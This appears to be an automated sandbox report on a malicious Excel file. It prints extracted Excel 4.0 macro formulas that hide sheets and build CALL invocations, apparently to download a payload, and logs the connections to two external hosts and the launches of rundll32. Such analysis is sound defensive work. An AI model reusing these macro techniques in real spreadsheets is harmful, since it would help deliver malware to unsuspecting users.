"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=SET.VALUE(AW27,before.3.4.35.sheet!BB5&before.3.4.35.sheet!BB6&before.3.4.35.sheet!BB7&before.3.4.35.sheet!BB9&before.3.4.35.sheet!BB10&before.3.4.35.sheet!BB11&before.3.4.35.sheet!BB12&before.3.4.35.sheet!BB13&before.3.4.35.sheet!BB14&before.3.4.35.sheet!BB15&before.3.4.35.sheet!BB16&before.3.4.35.sheet!BB17&before.3.4.35.sheet!BB18&before.3.4.35.sheet!BB19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet2"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet1"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet3"",1)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=Sheet1!AS18(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
"=CALL(Sheet2!AW23&""n"",Sheet2!AW24&""A"",Sheet2!AW22,Sheet2!BD15,Sheet3!A102,Sheet2!AZ29,0,0)=CALL(Sheet2!AW23&""n"",Sheet2!AW24&""A"",Sheet2!AW22,Sheet2!BD15,Sheet3!A103,Sheet2!AZ30,0,0)"=Sheet2!BD22()
Network Behavior |
---|
Network Port Distribution |
---|
- Total Packets: 27
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 22, 2021 15:20:13.064034939 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:13.222500086 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:13.222590923 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:13.244963884 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:13.405527115 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:13.417818069 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:13.417856932 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:13.417880058 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:13.417937040 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:13.417982101 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:13.473000050 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:13.672511101 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:13.687685013 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:13.687920094 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:15.340213060 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:15.498672962 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:15.546745062 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:15.546972990 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:15.547231913 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:15.548563957 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:15.548679113 CEST | 49165 | 443 | 192.168.2.22 | 162.241.225.246 |
Apr 22, 2021 15:20:15.620611906 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:15.675256968 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:15.675431013 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:15.676218987 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:15.707979918 CEST | 443 | 49165 | 162.241.225.246 | 192.168.2.22 |
Apr 22, 2021 15:20:15.729274988 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:15.759604931 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:15.759644985 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:15.759669065 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:15.759727001 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:15.760545969 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:15.813174963 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:15.890568018 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:15.890659094 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:15.929043055 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:16.023185968 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:16.394433022 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:16.394469023 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Apr 22, 2021 15:20:16.394613028 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:16.395162106 CEST | 49168 | 443 | 192.168.2.22 | 5.100.155.169 |
Apr 22, 2021 15:20:16.449620962 CEST | 443 | 49168 | 5.100.155.169 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 22, 2021 15:20:12.899084091 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 22, 2021 15:20:13.049699068 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Apr 22, 2021 15:20:14.053478956 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 22, 2021 15:20:14.103732109 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Apr 22, 2021 15:20:14.110492945 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 22, 2021 15:20:14.162839890 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Apr 22, 2021 15:20:14.726438046 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 22, 2021 15:20:14.786709070 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Apr 22, 2021 15:20:14.797799110 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 22, 2021 15:20:14.859829903 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
Apr 22, 2021 15:20:15.559335947 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 22, 2021 15:20:15.618439913 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 22, 2021 15:20:12.899084091 CEST | 192.168.2.22 | 8.8.8.8 | 0x73f5 | Standard query (0) | A (IP address) | IN (0x0001) | |
Apr 22, 2021 15:20:15.559335947 CEST | 192.168.2.22 | 8.8.8.8 | 0x8464 | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 22, 2021 15:20:13.049699068 CEST | 8.8.8.8 | 192.168.2.22 | 0x73f5 | No error (0) | 162.241.225.246 | A (IP address) | IN (0x0001) | ||
Apr 22, 2021 15:20:15.618439913 CEST | 8.8.8.8 | 192.168.2.22 | 0x8464 | No error (0) | 5.100.155.169 | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Apr 22, 2021 15:20:13.417880058 CEST | 162.241.225.246 | 443 | 192.168.2.22 | 49165 | CN=webmail.abpandh.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Sat Feb 13 08:15:22 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Fri May 14 09:15:22 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 | |||||||
Apr 22, 2021 15:20:15.759669065 CEST | 5.100.155.169 | 443 | 192.168.2.22 | 49168 | CN=cpcalendars.kamalandcompany.com CN=R3, O=Let's Encrypt, C=US | CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co. | Fri Mar 05 22:32:47 CET 2021 Wed Oct 07 21:21:40 CEST 2020 | Thu Jun 03 23:32:47 CEST 2021 Wed Sep 29 21:21:40 CEST 2021 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b |
CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
Start time: | 15:19:41 |
Start date: | 22/04/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f640000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Timing Activities
Windows UI Activities
Network Activities
Object Security Activities
LPC Port Activities
Start time: | 15:19:47 |
Start date: | 22/04/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa80000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Timing Activities
Windows UI Activities
LPC Port Activities
Start time: | 15:19:48 |
Start date: | 22/04/2021 |
Path: | C:\Windows\System32\rundll32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffa80000 |
File size: | 45568 bytes |
MD5 hash: | DD81D91FF3B0763C392422865C9AC12E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
File Activities
Section Activities
Registry Activities
Mutex Activities
Process Activities
Thread Activities
Memory Activities
System Activities
Timing Activities
Windows UI Activities
LPC Port Activities
Disassembly |
---|
Code Analysis |
---|